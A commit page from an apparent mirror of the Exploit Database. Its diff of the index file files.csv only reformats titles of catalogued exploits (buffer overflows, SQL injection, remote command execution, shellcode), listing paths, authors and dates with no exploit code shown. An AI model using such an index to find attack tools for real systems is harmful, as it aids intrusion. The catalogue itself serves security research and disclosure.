bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2016-04-05

Browse source 
4 new exploits

Outlook ATTACH_BY_REF_ONLY File Execution
Outlook - ATTACH_BY_REF_ONLY File Execution

HB Ecommerce SQL Injection Vulnerability
HB Ecommerce - SQL Injection Vulnerability

SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability
SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability

Debian Linux <= 2.1 Print Queue Control Vulnerability
Debian Linux <= 2.1 - Print Queue Control Vulnerability

FreeBSD 3.3 gdc Buffer Overflow Vulnerability
FreeBSD 3.3 gdc - Buffer Overflow Vulnerability

Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability
Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability

NullSoft Winamp 2.10 Playlist Vulnerability
NullSoft Winamp 2.10 - Playlist Vulnerability

S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)
S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)

Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability
Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability

NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability
NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability

NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability
NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability

My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability
My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability

Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference
Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference

Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability
Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability

Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability
Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability

IDA Pro 6.3 Crash PoC
IDA Pro 6.3 - Crash PoC

Confixx 2 Perl Debugger Remote Command Execution Vulnerability
Confixx 2 - Perl Debugger Remote Command Execution Vulnerability

Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability
Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability

Novell NetMail 3.x Automatic Script Execution Vulnerability
Novell NetMail 3.x - Automatic Script Execution Vulnerability

Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability
Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability

Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability
Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability

WordPress Freshmail Unauthenticated SQL Injection
WordPress Freshmail - Unauthenticated SQL Injection

WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS

Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass

ADH-Web Server IP-Cameras - Multiple Vulnerabilities
Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC
Hexchat IRC Client 2.11.0 - Directory Traversal
Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow
PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-04-05 05:03:46 +00:00
parent 5a85093c53
commit 13d072b592
8 changed files with 507 additions and 179 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

54
files.csv
View file

@ -14504,7 +14504,7 @@ id,file,description,date,author,platform,type,port
16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,metasploit,windows,remote,80
16698,platforms/windows/remote/16698.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,metasploit,windows,remote,0
16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,metasploit,windows,remote,0
16700,platforms/windows/remote/16700.rb,"Outlook ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0
16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0
16701,platforms/windows/remote/16701.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,windows,remote,3306
16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,metasploit,windows,remote,21
16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server Input Overflow",2010-10-05,metasploit,windows,remote,0
@ -15068,7 +15068,7 @@ id,file,description,date,author,platform,type,port
17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0
17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection Vulnerability",2011-05-26,"AutoSec Tools",php,webapps,0
17326,platforms/windows/shellcode/17326.rb,"DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0
17327,platforms/php/webapps/17327.txt,"HB Ecommerce SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0
17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0
17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0
17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0
17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0
@ -16525,7 +16525,7 @@ id,file,description,date,author,platform,type,port
19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0
19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0
19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 - /etc/group missing results in Root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0
19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0
19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0
19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D symlink Vulnerability",1998-07-15,emffmmadffsdf,linux,remote,0
19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid Vulnerability",1999-04-29,"Dan Sugalski",linux,local,0
19126,platforms/solaris/local/19126.txt,"Sun Solaris <= 2.6 power management Vulnerability",1998-07-16,"Ralf Lehmann",solaris,local,0
@ -16761,7 +16761,7 @@ id,file,description,date,author,platform,type,port
19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"Jesús López de Aguileta",multiple,remote,0
19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0
19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0
19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0
19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 - Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0
19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0
19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0
19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0
@ -17018,7 +17018,7 @@ id,file,description,date,author,platform,type,port
19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow Vulnerability (2)",1999-11-30,"Synnergy Networks",unix,remote,0
19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure",1999-11-30,UNYUN,solaris,local,0
19648,platforms/solaris/local/19648.c,"Solaris 7.0 CDE dtmail/mailtool Buffer Overflow Vulnerability",1999-11-30,UNYUN,solaris,local,0
19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc Symlink Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 Seyon setgid dialer Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
@ -17069,7 +17069,7 @@ id,file,description,date,author,platform,type,port
19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0
19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow Vulnerability",1999-12-31,"Ussr Labs",windows,dos,0
19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH Vulnerability",1999-12-30,Loneguard,multiple,local,0
19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0
19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0
19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 midikeys/soundplayer Vulnerability",1999-12-31,Loneguard,irix,local,0
19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link Vulnerability",1999-12-31,Loneguard,unix,local,0
19708,platforms/php/remote/19708.php,"PHP <= 3.0.13 - 'safe_mode' Failure Vulnerability",2000-01-04,"Kristian Koehntopp",php,remote,0
@ -17084,7 +17084,7 @@ id,file,description,date,author,platform,type,port
19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0
19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0
19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0
19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0
19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0
19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability",2000-02-15,"Viktor Fougstedt",multiple,local,0
19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1_IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0
19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH Vulnerability",2000-01-12,"Cesar Tascon Alvarez",linux,local,0
@ -17308,7 +17308,7 @@ id,file,description,date,author,platform,type,port
19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability",2000-05-18,"Chris Evans",linux,dos,0
19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0_Cart32 2.5 a/3.0_Shop Express 1.0_StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability",2000-02-01,CDI,cgi,remote,0
19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0
19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0
19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0
19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0
19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0_qpopper 2.52/2.53 - 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0
19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal Vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000
@ -17732,15 +17732,15 @@ id,file,description,date,author,platform,type,port
20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0
20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS Vulnerability",2000-11-10,sozni,cgi,dos,0
21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0
20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0
20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0
20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0
20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,dos,0
20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0
20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0
20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0
20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - _thesection_ Directory Traversal Vulnerability",2000-11-20,zorgon,cgi,remote,0
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 Svgalib Buffer Overflow Vulnerability",2000-11-20,Synnergy.net,unix,local,0
20411,platforms/linux/local/20411.c,"Oracle 8.x cmctl Buffer Overflow Vulnerability",2000-11-20,anonymous,linux,local,0
20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 JSP Source Disclosure Vulnerability",2000-11-21,"Wojciech Woch",jsp,remote,0
@ -18836,7 +18836,7 @@ id,file,description,date,author,platform,type,port
21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0
21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0
21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File Arbitrary Command Execution Vulnerability",2002-06-15,onlooker,php,webapps,0
21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0
21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0
21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)",2002-06-17,"Gobbles Security",multiple,remote,0
21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)",2002-06-17,"Gobbles Security",multiple,remote,0
21561,platforms/hardware/dos/21561.txt,"Zyxel Prestige 642R Malformed Packet Denial of Service Vulnerability",2002-07-17,"Kistler Ueli",hardware,dos,0
@ -19107,7 +19107,7 @@ id,file,description,date,author,platform,type,port
21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability",2002-09-23,"Taylor Huff",hardware,remote,0
21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service Vulnerability",2002-09-24,"Brook Powers",hardware,dos,0
21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection Vulnerability",2002-09-24,das@hush.com,php,webapps,0
21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0
21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload Vulnerability",2012-10-10,metasploit,php,webapps,0
21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload Vulnerability",2012-10-10,metasploit,linux,webapps,0
@ -19587,7 +19587,7 @@ id,file,description,date,author,platform,type,port
22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall Content Filter Bypassing Vulnerability",2003-03-05,bit_logic,multiple,remote,0
22328,platforms/windows/dos/22328.txt,"Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow Vulnerability",2003-03-05,"Fernandez Madrid",windows,dos,0
22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 HTML Source Password Retrieval Vulnerability",2003-03-03,THR,windows,local,0
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0
22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0
22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution Vulnerability",2003-03-06,"gregory Le Bras",php,webapps,0
22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 Logbook.pl Remote Command Execution Vulnerability",2003-03-07,"Aleksey Sintsov",cgi,webapps,0
22338,platforms/windows/remote/22338.txt,"Clearswift MailSweeper 4.x Malformed MIME Attachment Filter Bypass Vulnerability",2003-03-07,http-equiv,windows,remote,0
@ -19622,7 +19622,7 @@ id,file,description,date,author,platform,type,port
22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0
22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0
22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0
22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0
@ -20745,7 +20745,7 @@ id,file,description,date,author,platform,type,port
23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0
23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0
23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0
23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 Crash PoC",2012-12-20,nitr0us,multiple,dos,0
23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0
23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting Vulnerability",2004-01-06,Windak,php,webapps,0
23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 PHPInfo Information Disclosure Weakness",2004-01-06,Windak,php,webapps,0
23527,platforms/hardware/remote/23527.txt,"ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",hardware,remote,0
@ -21008,7 +21008,7 @@ id,file,description,date,author,platform,type,port
23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 Pop Parameter Cross-Site Scripting Vulnerability",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0
23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability",2004-03-09,shaun2k2,windows,remote,0
23797,platforms/php/webapps/23797.txt,"Confixx 2 DB Parameter SQL Injection Vulnerability",2004-03-09,wkr,php,webapps,0
23798,platforms/php/webapps/23798.txt,"Confixx 2 Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0
23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0
23799,platforms/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String Vulnerability",2004-03-10,"Luigi Auriemma",multiple,dos,0
23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0
23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting Vulnerability",2004-03-11,"Donato Ferrante",linux,remote,0
@ -22941,7 +22941,7 @@ id,file,description,date,author,platform,type,port
25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability",2005-06-01,"Jim Pangalos",asp,webapps,0
25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0
25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 LOGIN.ASP SQL Injection Vulnerability",2005-06-01,"Dj romty",asp,webapps,0
25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0
25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0
25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0
25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0
25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0
@ -23068,7 +23068,7 @@ id,file,description,date,author,platform,type,port
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0
25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0
25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0
25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0
25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution Vulnerability",2005-06-29,blahplok,cgi,webapps,0
25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 Read.PHP SQL Injection Vulnerability",2004-10-24,"Positive Technologies",php,webapps,0
@ -23321,7 +23321,7 @@ id,file,description,date,author,platform,type,port
26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0
26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0
26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability",2005-08-17,anonymous,windows,remote,0
26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0
26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0
26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 Site Parameter Directory Traversal Vulnerability",2005-08-18,matrix_killer,php,webapps,0
26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 login.php course Parameter XSS",2005-08-18,matrix_killer,php,webapps,0
26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.PHP Arbitrary Command Execution Vulnerability",2005-08-18,rgod,php,webapps,0
@ -25943,7 +25943,7 @@ id,file,description,date,author,platform,type,port
28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0
28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0
